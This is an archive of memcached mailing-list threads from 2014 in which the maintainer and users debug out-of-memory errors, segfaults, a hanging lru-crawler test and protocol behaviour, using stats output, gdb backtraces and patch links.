What's *extra* exciting is that 1.4.20 now has the stats conns command.

If this happens again, while a .20 machine is actively OOM'ing, can you
grab a couple copies of the stats conns output, a few minutes apart?
That should definitively tell us if there are stuck connections causing
this issue.

Someone had a PR open for adding idle connection timeouts, but I asked
them to redo it on top of the 'stats conns' work as a more efficient
background thread. I could potentially finish this and it would be usable
as a workaround. You could also enable tcp keepalives, or otherwise fix
whatever's causing these events.

I wonder if it's also worth attempting to relink an item that ends up in
the tail but has references? That would at least potentially get them out
of the way of memory reclamation.

Thanks!

On Wed, 2 Jul 2014, Denis Samoylov wrote:

 1)  OOM's on slab 13, but it recovered on its own? This is under version 
 1.4.20 and you did *not* enable tail repairs? correct

 2) Can you share (with me at least) the full stats/stats items/stats slabs 
 output from one of the affected servers running 1.4.20? 
 sent you _current_ stats from the server that had OOM couple days ago and 
 still running (now with no issues).

 3) Can you confirm that 1.4.20 isn't *crashing*, but is actually exhibiting 
 write failures? 
 correct

 we will enable saving stderr to log. may be this can show something. If you 
 have any other ideas - let me know.

 -denis



 On Wednesday, July 2, 2014 1:36:57 PM UTC-7, Dormando wrote:
   Cool. That is disappointing.

   Can you clarify a few things for me:

   1) You're saying that you were getting OOM's on slab 13, but it 
 recovered
   on its own? This is under version 1.4.20 and you did *not* enable tail
   repairs?

   2) Can you share (with me at least) the full stats/stats items/stats 
 slabs
   output from one of the affected servers running 1.4.20?

   3) Can you confirm that 1.4.20 isn't *crashing*, but is actually
   exhibiting write failures?

   If it's not a crash, and your hash power level isn't expanding, I don't
   think it's related to the other bug.

   thanks!

   On Wed, 2 Jul 2014, Denis Samoylov wrote:

Dormando, sure, we will add option to preset hashtable. (as i see nn 
 should be 26).
One question: as i see in logs for the servers there is no change for 
 hash_power_level before incident (it would be hard to say for
   crushed but .20
just had outofmemory and i have solid stats). Does not this 
 contradict the idea of cause? Server had hash_power_level = 26 for days
   before and
still has 26 days after. Just for three hours every set for slab 13 
 failed. We did not reboot/flush server and it continues to work
   without
problem. What do you think?
   
On Tuesday, July 1, 2014 2:43:49 PM UTC-7, Dormando wrote:
      Hey,
   
      Can you presize the hash table? (-o hashpower=nn) to be large 
 enough on
      those servers such that hash expansion won't happen at runtime? 
 You can
      see what hashpower is on a long running server via stats to 
 know what to
      set the value to.
   
      If that helps, we might still have a bug in hash expansion. I 
 see someone
      finally reproduced a possible issue there under .20. .17/.19 
 fix other
      causes of the problem pretty thoroughly though.
   
      On Tue, 1 Jul 2014, Denis Samoylov wrote:
   
       Hi,
       We had sporadic memory corruption due tail repair in pre .20 
 version. So we updated some our servers to .20. This Monday we
   observed
      several
       crushes in .15 version and tons of allocation failure in 
 .20 version. This is expected as .20 just disables tail repair
   but it
      seems the
       problem is still there. What is interesting:
       1) there is no visible change in traffic and only one slab is 
 affected usually. 
       2

Re: slab re-balance seems not thread-safty

2014-07-02 Thread dormando
the item lock is already held for that key when do_item_get is called,
which is why the nolock code is called there.

slab rebalance has that second short-circuiting of fetches to ensure very
hot items don't permanently jam a page move.

On Wed, 2 Jul 2014, Zhiwei Chan wrote:

 Hi all,   I have thought carefully about the the thread-safe memcached 
 recently, and found that if the re-balance is running, it may not
 thread-safety. The code do_item_get-do_item_unlink_nolock may corrupt the 
 hash table. Whenever it trying to modify the hash table, it should get
 cache_lock, but the function do_item_get have not got the cache_lock.
    Please tell me if anything i neglected.

 /** wrapper around assoc_find which does the lazy expiration logic */
 item *do_item_get(const char *key, const size_t nkey, const uint32_t hv) {
     //mutex_lock(cache_lock);
     item *it = assoc_find(key, nkey, hv);
     if (it != NULL) {
         refcount_incr(it-refcount);
         /* Optimization for slab reassignment. prevents popular items from
          * jamming in busy wait. Can only do this here to satisfy lock order
          * of item_lock, cache_lock, slabs_lock. */
         if (slab_rebalance_signal 
             ((void *)it = slab_rebal.slab_start  (void *)it  
 slab_rebal.slab_end)) {
             do_item_unlink_nolock(it, hv);   
 --- no lock 
 before unlink.
             do_item_remove(it);
             it = NULL;
         }
     }

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: tail repair issue (1.4.20)

2014-07-01 Thread dormando
Hey,

Can you presize the hash table? (-o hashpower=nn) to be large enough on
those servers such that hash expansion won't happen at runtime? You can
see what hashpower is on a long running server via stats to know what to
set the value to.

If that helps, we might still have a bug in hash expansion. I see someone
finally reproduced a possible issue there under .20. .17/.19 fix other
causes of the problem pretty thoroughly though.

On Tue, 1 Jul 2014, Denis Samoylov wrote:

 Hi,
 We had sporadic memory corruption due tail repair in pre .20 version. So we 
 updated some our servers to .20. This Monday we observed several
 crushes in .15 version and tons of allocation failure in .20 version. This 
 is expected as .20 just disables tail repair but it seems the
 problem is still there. What is interesting:
 1) there is no visible change in traffic and only one slab is affected 
 usually. 
 2) this always happens with several but not all servers :)

 Is there any way to catch this and help with debug? I have all slab and item 
 stats for the time around incident for .15 and .20 version. .15 is
 clearly memory corruption: gdb shows that hash function returned 0 (line 115 
 uint32_t hv = hash(ITEM_key(search), search-nkey, 0);).

 so we seems hitting this comment:
             /* Old rare bug could cause a refcount leak. We haven't seen
              * it in years, but we leave this code in to prevent failures
              * just in case */

 :)

 Thank you,
 Denis

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: slabclass_t.slots

2014-06-05 Thread dormando
Yes this is fixed in .17. 1.4.20 is the recommended version.

The corruption isn't in this function, it's outside of it:

https://github.com/memcached/memcached/pull/67

On Wed, 4 Jun 2014, Denis Samoylov wrote:

 hi,
 We got a segfault today (stack is below if interesting, we use 1.4.15 and yes 
 i saw Dormando comment about some fixes in .17 but I cannot trace any
 fix related). My question is actually slightly different - i do grep and i do 
 not see where we initialize slabclass_t-slots. It is set to 0(zero)
 in slabs_init (by memset). And also I see 8 usages across the file slabs.c 
 including one declaration and one assert (that will cause segfault :) ).
  

 in do_slabs_alloc, i immediately see code:

 it = (item *)p-slots;
 p-slots = it-next;

 which assumes that p-slots contains something. But i do not see where slots 
 gets value. I definitely miss something simple. Pls point this field
 initialization code.

 (all other usages in free and rebalance that we do not use and i assume are 
 used after something is allocated :) )

 Thank you!

 segfault call stack:

 #0  do_slabs_alloc (size=853, id=11) at slabs.c:241

 #1  slabs_alloc (size=853, id=11) at slabs.c:404

 #2  0x0040edc4 in do_item_alloc (

     key=0x7f256713e4d4 
 d_1_v1422c8a1df8a89589777042ac1257ea35|folder_by_id.2041369764.children, 
 nkey=71, 

     flags=value optimized out, exptime=1049722, nbytes=717, 
 cur_hv=2547497763) at items.c:150

 #3  0x00409476 in process_update_command (c=0x7f256451ed50, 
 tokens=value optimized out, 

     ntokens=value optimized out, comm=2, handle_cas=value optimized out) 
 at memcached.c:2917

 #4  0x004099ab in process_command (c=0x7f256451ed50, command=value 
 optimized out) at memcached.c:3258

 #5  0x0040a5a2 in try_read_command (c=0x7f256451ed50) at 
 memcached.c:3504

 #6  0x0040b1a8 in drive_machine (fd=value optimized out, 
 which=value optimized out, arg=0x7f256451ed50) at memcached.c:3824

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Memcached 1.4.19 Build Not Working - Compiling from Source

2014-05-28 Thread dormando
I may have misread. When you said the server was sitting at 100% CPU, what
exactly was using all of the CPU? memcached? perl?

On Wed, 28 May 2014, Alex Gemmell wrote:

 Yep, it's 1.4.20.  I followed the instructions here 
 http://memcached.org/downloads and ran wget http://memcached.org/latest;.
 Just to be sure, this morning I ran wget 
 http://memcached.org/files/memcached-1.4.20.tar.gz; and tried to compile it 
 and got exactly the same
 problem.

 I followed your instructions and here's the output (I hope I did this right?)

 ==
 (gdb) thread apply all bt

 Thread 7 (Thread 0x7fffe7fff700 (LWP 8785)):
 #0  0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib64/libpthread.so.0
 #1  0x00416bc9 in item_crawler_thread (arg=value optimized out) at 
 items.c:772
 #2  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
 #3  0x0036df8e8b7d in clone () from /lib64/libc.so.6

 Thread 6 (Thread 0x752dd700 (LWP 8773)):
 #0  0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib64/libpthread.so.0
 #1  0x0041860d in assoc_maintenance_thread (arg=value optimized 
 out) at assoc.c:251
 #2  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
 #3  0x0036df8e8b7d in clone () from /lib64/libc.so.6

 Thread 5 (Thread 0x75cde700 (LWP 8772)):
 #0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
 #1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
 #2  0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5
 #3  0x004197b5 in worker_libevent (arg=0x645f30) at thread.c:386
 #4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
 #5  0x0036df8e8b7d in clone () from /lib64/libc.so.6

 Thread 4 (Thread 0x766df700 (LWP 8771)):
 #0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
 #1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
 #2  0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5
 #3  0x004197b5 in worker_libevent (arg=0x642ba0) at thread.c:386
 ---Type return to continue, or q return to quit---
 #4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
 #5  0x0036df8e8b7d in clone () from /lib64/libc.so.6

 Thread 3 (Thread 0x770e0700 (LWP 8770)):
 #0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
 #1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
 #2  0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5
 #3  0x004197b5 in worker_libevent (arg=0x63f810) at thread.c:386
 #4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
 #5  0x0036df8e8b7d in clone () from /lib64/libc.so.6

 Thread 2 (Thread 0x77ae1700 (LWP 8769)):
 #0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
 #1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
 #2  0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5
 #3  0x004197b5 in worker_libevent (arg=0x63c480) at thread.c:386
 #4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
 #5  0x0036df8e8b7d in clone () from /lib64/libc.so.6

 Thread 1 (Thread 0x77b8d700 (LWP 8766)):
 #0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
 #1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
 #2  0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5
 #3  0x00408a25 in main (argc=value optimized out, argv=value 
 optimized out) at memcached.c:5628
 ==


 On Tuesday, 27 May 2014 19:09:56 UTC-7, Dormando wrote:
   You're completely sure that's the 1.4.20 source tree?

   That bug was pretty well fixed...

   If you are definitely testing a 1.4.20 binary, here's the way to grab a
   trace:

   start memcached-debug under gdb:

   gdb ./memcached-debug
handle SIGPIPE nostop noprint pass
r

   T_MEMD_USE_DAEMON=127.0.0.1:11211 prove -v t/lru-crawler.t

   ... wait until it's been spinning cpu for a few seconds. Then ^C the GDB
   window and run thread apply all bt
   .. and send me that info.

   On Tue, 27 May 2014, Alex Gemmell wrote:

Hello Dormando,
I am having exactly the same issue but with Memcached 1.4.20.
   
My server specs are: RHEL 6 (Linux 2.6.32-358.23.2.el6.x86_64), 
 1880MB RAM, single core :(
   
Here are the results of me running prove -v t/lru-crawler.t.  It 
 took exactly 10m 15s to run before it timed out.  I watched htop
   while it was
running and the single CPU sat at 100% (which is to be expected I 
 guess) but the total server memory barely changed and never rose
   above 330MB.
   
=
  prove -v t/lru-crawler.t
t/lru-crawler.t ..
1..189
ok 1
ok 2 - stored key
ok 3 - stored key
ok 4 - stored key
ok 5 - stored key

Re: Memcached 1.4.19 Build Not Working - Compiling from Source

2014-05-28 Thread dormando
Can you try this patch?
https://github.com/dormando/memcached/commit/724bfb34484347963a27051fed2b4312e189ace3

Either apply it yourself, or just download the raw file:
https://raw.githubusercontent.com/dormando/memcached/724bfb34484347963a27051fed2b4312e189ace3/t/lru-crawler.t

On Wed, 28 May 2014, Alex Gemmell wrote:

 Perl mostly.  Screenshot - https://cloudup.com/c-osDM4rjYU

 On Wednesday, 28 May 2014 11:16:22 UTC-7, Dormando wrote:
   I may have misread. When you said the server was sitting at 100% CPU, 
 what
   exactly was using all of the CPU? memcached? perl?

   On Wed, 28 May 2014, Alex Gemmell wrote:

Yep, it's 1.4.20.  I followed the instructions here 
 http://memcached.org/downloads and ran wget http://memcached.org/latest;.
Just to be sure, this morning I ran wget 
 http://memcached.org/files/memcached-1.4.20.tar.gz; and tried to compile it 
 and got exactly
   the same
problem.
   
I followed your instructions and here's the output (I hope I did this 
 right?)
   
==
(gdb) thread apply all bt
   
Thread 7 (Thread 0x7fffe7fff700 (LWP 8785)):
#0  0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib64/libpthread.so.0
#1  0x00416bc9 in item_crawler_thread (arg=value optimized 
 out) at items.c:772
#2  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
#3  0x0036df8e8b7d in clone () from /lib64/libc.so.6
   
Thread 6 (Thread 0x752dd700 (LWP 8773)):
#0  0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib64/libpthread.so.0
#1  0x0041860d in assoc_maintenance_thread (arg=value 
 optimized out) at assoc.c:251
#2  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
#3  0x0036df8e8b7d in clone () from /lib64/libc.so.6
   
Thread 5 (Thread 0x75cde700 (LWP 8772)):
#0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
#1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
#2  0x77ba2c46 in event_base_loop () from 
 /usr/lib64/libevent-2.0.so.5
#3  0x004197b5 in worker_libevent (arg=0x645f30) at 
 thread.c:386
#4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
#5  0x0036df8e8b7d in clone () from /lib64/libc.so.6
   
Thread 4 (Thread 0x766df700 (LWP 8771)):
#0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
#1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
#2  0x77ba2c46 in event_base_loop () from 
 /usr/lib64/libevent-2.0.so.5
#3  0x004197b5 in worker_libevent (arg=0x642ba0) at 
 thread.c:386
---Type return to continue, or q return to quit---
#4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
#5  0x0036df8e8b7d in clone () from /lib64/libc.so.6
   
Thread 3 (Thread 0x770e0700 (LWP 8770)):
#0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
#1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
#2  0x77ba2c46 in event_base_loop () from 
 /usr/lib64/libevent-2.0.so.5
#3  0x004197b5 in worker_libevent (arg=0x63f810) at 
 thread.c:386
#4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
#5  0x0036df8e8b7d in clone () from /lib64/libc.so.6
   
Thread 2 (Thread 0x77ae1700 (LWP 8769)):
#0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
#1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
#2  0x77ba2c46 in event_base_loop () from 
 /usr/lib64/libevent-2.0.so.5
#3  0x004197b5 in worker_libevent (arg=0x63c480) at 
 thread.c:386
#4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
#5  0x0036df8e8b7d in clone () from /lib64/libc.so.6
   
Thread 1 (Thread 0x77b8d700 (LWP 8766)):
#0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
#1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
#2  0x77ba2c46 in event_base_loop () from 
 /usr/lib64/libevent-2.0.so.5
#3  0x00408a25 in main (argc=value optimized out, 
 argv=value optimized out) at memcached.c:5628
==
   
   
On Tuesday, 27 May 2014 19:09:56 UTC-7, Dormando wrote:
      You're completely sure that's the 1.4.20 source tree?
   
      That bug was pretty well fixed...
   
      If you are definitely testing a 1.4.20 binary, here's the way 
 to grab a
      trace:
   
      start memcached-debug under gdb:
   
      gdb ./memcached-debug
       handle SIGPIPE nostop noprint pass
       r

Re: Memcached 1.4.19 Build Not Working - Compiling from Source

2014-05-27 Thread dormando
You're completely sure that's the 1.4.20 source tree?

That bug was pretty well fixed...

If you are definitely testing a 1.4.20 binary, here's the way to grab a
trace:

start memcached-debug under gdb:

gdb ./memcached-debug
 handle SIGPIPE nostop noprint pass
 r

T_MEMD_USE_DAEMON=127.0.0.1:11211 prove -v t/lru-crawler.t

... wait until it's been spinning cpu for a few seconds. Then ^C the GDB
window and run thread apply all bt
.. and send me that info.

On Tue, 27 May 2014, Alex Gemmell wrote:

 Hello Dormando,
 I am having exactly the same issue but with Memcached 1.4.20.

 My server specs are: RHEL 6 (Linux 2.6.32-358.23.2.el6.x86_64), 1880MB RAM, 
 single core :(

 Here are the results of me running prove -v t/lru-crawler.t.  It took 
 exactly 10m 15s to run before it timed out.  I watched htop while it was
 running and the single CPU sat at 100% (which is to be expected I guess) but 
 the total server memory barely changed and never rose above 330MB.

 =
   prove -v t/lru-crawler.t
 t/lru-crawler.t ..
 1..189
 ok 1
 ok 2 - stored key
 ok 3 - stored key
 ok 4 - stored key
 ok 5 - stored key
 ok 6 - stored key
 ok 7 - stored key
 ok 8 - stored key
 ok 9 - stored key
 ok 10 - stored key
 ok 11 - stored key
 ok 12 - stored key
 ok 13 - stored key
 ok 14 - stored key
 ok 15 - stored key
 ok 16 - stored key
 ok 17 - stored key
 ok 18 - stored key
 ok 19 - stored key
 ok 20 - stored key
 ok 21 - stored key
 ok 22 - stored key
 ok 23 - stored key
 ok 24 - stored key
 ok 25 - stored key
 ok 26 - stored key
 ok 27 - stored key
 ok 28 - stored key
 ok 29 - stored key
 ok 30 - stored key
 ok 31 - stored key
 ok 32 - stored key
 ok 33 - stored key
 ok 34 - stored key
 ok 35 - stored key
 ok 36 - stored key
 ok 37 - stored key
 ok 38 - stored key
 ok 39 - stored key
 ok 40 - stored key
 ok 41 - stored key
 ok 42 - stored key
 ok 43 - stored key
 ok 44 - stored key
 ok 45 - stored key
 ok 46 - stored key
 ok 47 - stored key
 ok 48 - stored key
 ok 49 - stored key
 ok 50 - stored key
 ok 51 - stored key
 ok 52 - stored key
 ok 53 - stored key
 ok 54 - stored key
 ok 55 - stored key
 ok 56 - stored key
 ok 57 - stored key
 ok 58 - stored key
 ok 59 - stored key
 ok 60 - stored key
 ok 61 - stored key
 ok 62 - stored key
 ok 63 - stored key
 ok 64 - stored key
 ok 65 - stored key
 ok 66 - stored key
 ok 67 - stored key
 ok 68 - stored key
 ok 69 - stored key
 ok 70 - stored key
 ok 71 - stored key
 ok 72 - stored key
 ok 73 - stored key
 ok 74 - stored key
 ok 75 - stored key
 ok 76 - stored key
 ok 77 - stored key
 ok 78 - stored key
 ok 79 - stored key
 ok 80 - stored key
 ok 81 - stored key
 ok 82 - stored key
 ok 83 - stored key
 ok 84 - stored key
 ok 85 - stored key
 ok 86 - stored key
 ok 87 - stored key
 ok 88 - stored key
 ok 89 - stored key
 ok 90 - stored key
 ok 91 - stored key
 ok 92 - slab1 has 90 used chunks
 ok 93 - enabled lru crawler
 ok 94
 ok 95 - kicked lru crawler
 Timeout.. killing the process
 Failed 94/189 subtests

 Test Summary Report
 ---
 t/lru-crawler.t (Wstat: 13 Tests: 95 Failed: 0)
   Non-zero wait status: 13
   Parse errors: Bad plan.  You planned 189 tests but ran 95.
 Files=1, Tests=95, 600 wallclock secs ( 0.09 usr  0.01 sys + 352.24 cusr 
 61.28 csys = 413.62 CPU)
 Result: FAIL
 =

 Any ideas?


 On Thursday, 1 May 2014 18:28:57 UTC-7, Dormando wrote:
   What's the output of:

   $ prove -v t/lru-crawler.t

   How long are the tests taking to run? This has definitely been tested on
   ubuntu 12.04 (which is what I assume you meant?), but not something with
   so little RAM.

   On Thu, 1 May 2014, Wilfred Khalik wrote:

Hi guys,
   
I get the below failure error when I run the make test command:
   
Any help would be appreciated.I am running this on 512MB Digital 
 Ocean VPS by the way on Linux 12.0.4.4 LTS.
   
Slab Stats 64
Thread stats 200
Global stats 208
Settings 124
Item (no cas) 32
Item (cas) 40
Libevent thread 100
Connection 340

libevent thread cumulative 13100
Thread stats cumulative 13000
./testapp
1..48
ok 1 - cache_create
ok 2 - cache_constructor
ok 3 - cache_constructor_fail
ok 4 - cache_destructor
ok 5 - cache_reuse
ok 6 - cache_redzone
ok 7 - issue_161
ok 8 - strtol
ok 9 - strtoll
ok 10 - strtoul
ok 11 - strtoull
ok 12 - issue_44
ok 13 - vperror
ok 14 - issue_101
ok 15 - start_server
ok 16 - issue_92
ok 17 - issue_102
ok 18 - binary_noop
ok 19 - binary_quit
ok 20 - binary_quitq
ok 21 - binary_set
ok 22 - binary_setq
ok 23 - binary_add
ok 24 - binary_addq
ok 25 - binary_replace
ok 26 - binary_replaceq
ok 27

Re: Memcached read/write consistency

2014-05-12 Thread dormando
memcached's operations are all atomic. Always have been, always will be,
barring bugs.

Wouldn't be much useful to anyone if you could have a get come back with
half a set... I answer this question a lot and it's pretty bizarre that
people think it's how it works.

Internally, items are generally immutable (except in one case). If you
set a new object in place of an old one, new memory is assigned, the old
one is removed from the hash table, and the new one put into it. The old
one sticks around so long as anyone is still reading from it, then it is
garbage collected (via refcounts). Reads are always consistent and writes
don't clobber each other. That would be *insane*.

The only exception is incr/decr, which will rewrite the existing item if
nobody else is accessing it at the time. If it is being accessed, it
allocates new memory as normal.

I wonder if I should bump this answer higher up on the wiki somewhere?
It's kind of a silly question but it does keep getting asked...

On Mon, 12 May 2014, Ezekiel Victor wrote:

 OK I just noticed that Membase is now Couchbase, but the point remains. Also 
 one of the things we talked about is if the server dies in the middle
 of a write, what level of protection do you have for the data that would have 
 been written? I guess this discussion would be more about Couchbase
 at this point.

 On Monday, May 12, 2014 2:33:29 PM UTC-7, Ezekiel Victor wrote:
   A coworker and I were having a discussion about whether to use MySQL or 
 memcached for a key-value store. My view is that memcached is
   designed to be exactly that, and if we desire persistence we can use 
 Membase. He alleged that memcached lacks read/write consistency,
   such that you can end up reading a half-value if you were to read in 
 the middle of a write. Is this true? I have used memcached under
   many thousands of reads/writes per second on a high traffic site and 
 never ran into any such problem.

 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


1.4.20 released

2014-05-11 Thread dormando
fixes a hang regression seen in .18 and .19. does not affect .17 or newer.
no other changes.

-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to memcached+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.


Re: Multi-get implementation in binary protocol

2014-05-09 Thread dormando
Unfortunately binprot isn't that much faster processing wise... what it
does give you is a bunch of safe features (batching set's, mixing
sets/gets and the like).

You *can* reduce the packet load on the server a bit by ensuring your
client is actually batching the binary multiget packets together, then
it's only the server increasing the packet load...

On Fri, 9 May 2014, Byung-chul Hong wrote:

 Hello, Ryan, dormando,

 Thanks a lot for the clear explanation and the comments.
 I'm trying to find out how many requests I can batch as a muli-get within the 
 allowed latency.
 I think multi-get has many advantages, the only penalty is the longer latency 
 as pointed out in the above answer.
 But, the longer latency may not be a real issue unless it exceeds some 
 threshold that the end users can notice.
 So, now I'm trying to use multi-get as much as possible.

 Actually, I have thought that Binary protocol would be always better than 
 ascii protocol since binary protocol
 can reduce the burden of parsing in the Server side, but it seems that I need 
 to test both cases.

 Thanks again for the comments, and I will share the result if I get some 
 interesting or useful data.

 Byungchul.



 2014-05-08 9:30 GMT+09:00 dormando dorma...@rydia.net:
Hello,
   
For now, I'm trying to evaluate the performance of memcached server 
 by using several client workloads.
I have a question about multi-get implementation in binary protocol.
As I know, in ascii protocol, we can send multiple keys in a single 
 request packet to implement multi-get.
   
But, in a binary protocol, it seems that we should send multiple 
 request packets (one request packet per key) to implement multi-get.
Even though we send multiple getQ, then sends get for the last key, 
 we only can save the number of response packets only for cache
   miss.
If I understand correctly, multi-get in binary protocol cannot reduce 
 the number of request packets, and
it also cannot reduce the number of response packets if hit-ratio is 
 very high (like 99% get hit).
   
If the performance bottleneck is on the network side not on the CPU, 
 I think reducing the number of packets is still very important,
but I don't understand why the binary protocol doesn't care about 
 this.
I missed something?

 you're right, it sucks. I was never happy with it, but haven't had time to
 add adjustments to the protocol for this. To note, with .19 some
 inefficiencies with the protocol were lifted, and most network cards are
 fast enough for most situations, even if it's one packet per response (and
 for large enough responses they split into multiple packets, anyway).

 The reason why this was done is for latency and streaming of responses:

 - In ascii multiget, I can send 10,000 keys, then I'm forced to wait for
 the server to look up all of the keys before sending its responses, this
 isn't typically very high but there's some latency to it.

 - In binary multiget, the responses are sent back as it receives them from
 the network more or less. This reduces the latency to when you start
 seeing responses, regardless of how large your multiget is. this is useful
 if you have a kind of client which can start processing responses in a
 streaming fashion. This potentially reduces the total time to render your
 response since you can keep the CPU busy unmarshalling responses instead
 of sleeping.

 However, it should have some tunables: One where it at least does one
 write per complete packet (TCP_CORK'ed, or similar), and one where it
 buffers up to some size. In my tests I can get ascii multiget up to 16.2
 million keys/sec, but (with the fixes in .19) binprot caps out at 4.6m and
 is spending all of its time calling sendmsg(). Most people need far, far
 less than that, so the binprot as is should be okay though.

 The code isn't too friendly to this and there're other higher priority
 things I'd like to get done sooner. The relatively few number of people
 who do 500,000+ requests per second in binprot (they're almost always
 ascii at that scale) is the other reason.

 --

 ---
 You received this message because you are subscribed to a topic in the Google 
 Groups memcached group.
 To unsubscribe from this topic, visit 
 https://groups.google.com/d/topic/memcached/QwjEftFhtCY/unsubscribe.
 To unsubscribe from this group and all its topics, send an email to 
 memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.


 --

 ---
 You received this message because you are subscribed to the Google Groups 
 memcached group.
 To unsubscribe from this group and stop receiving emails from it, send an 
 email to memcached+unsubscr...@googlegroups.com.
 For more options, visit https://groups.google.com/d/optout.



-- 

--- 
You received this message because you are subscribed to the Google Groups 
memcached group.
To unsubscribe from

Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout

2014-05-09 Thread dormando
Can you give me a list (privately, if need be) of a few things:

- The exact OS your server is running (centos/redhat release/etc)
- The exact kernel version (and where it came from? centos/rh proper or a
3rd party repo?)
- Full list of your 3rd party repos, since I know you had some random
french thing in there.
- Full list of packages installed from 3rd party repos.

It is extremely important that all of the software matches.

- Hardware details:
  - Network card(s), speeds
  - CPU type, number of cores (hyperthreading?)
  - Amount of RAM

- Is this a hardware machine, or a VM somewhere? If a VM, what provider?

- memcached stats snapshots again, from your machine after it's been
running a while:
  - stats, stats slabs, stats items, stats settings, stats
conns.
^ That's five commands, don't forget any.

It's too difficult to try to debug the issue when you hit it. usually
when I'm at a gdb console I'm issuing a command every second or two, but
it takes us 10 minutes to get through 3-4 commands. It'd be nice if I
could attempt to reproduce it here.

I went digging more and there're some dup() bugs with epoll, except your
libevent is new enough to have those patched.. plus we're not using dup()
in such a way to cause the bug.

There was also an EPOLL_CTL_MOD race condition in the kernel, but so far
as I can tell even with libevent 2.x libevent's not using that feature for
us.

The issue does smell like the bug that happens with dup()'s - the events
keep happening and the fd sits half closed, but again we're never closing
those sockets.

I can also make a branch with the new dup() calls explicitly removed, but
this continues to be obnoxious multi-week-long debugging.

I'm convinced that the code in memcached is correct and the bug exists
outside of it (libevent or the kernel). There's simply no way for it to
hit that code path without closing the socket, and doubly so: epoll
automatically delete's an event when the socket is closed. We delete it
then close it, and it still comes back.

It's not possible a connection ends up in the wrong thread, since both
connection initialization and close happens local to a thread. We would
need to have a new connection come in with a duplicated fd. If that
happens, nothing on your machine would work.

thanks.

On Thu, 8 May 2014, notificati...@commando.io wrote:

 I am just speculating, and by no means have any idea what I am really talking 
 about here. :)
 With 2 threads, still solid, no timeouts, no runaway 100% cpu. Its been days. 
 Increasing from 2 threads to 4 does not generate any more traffic or
 requests to memcached. Thus I am speculating perhaps it is a race-condition 
 or some sort, only hitting with  2 threads.

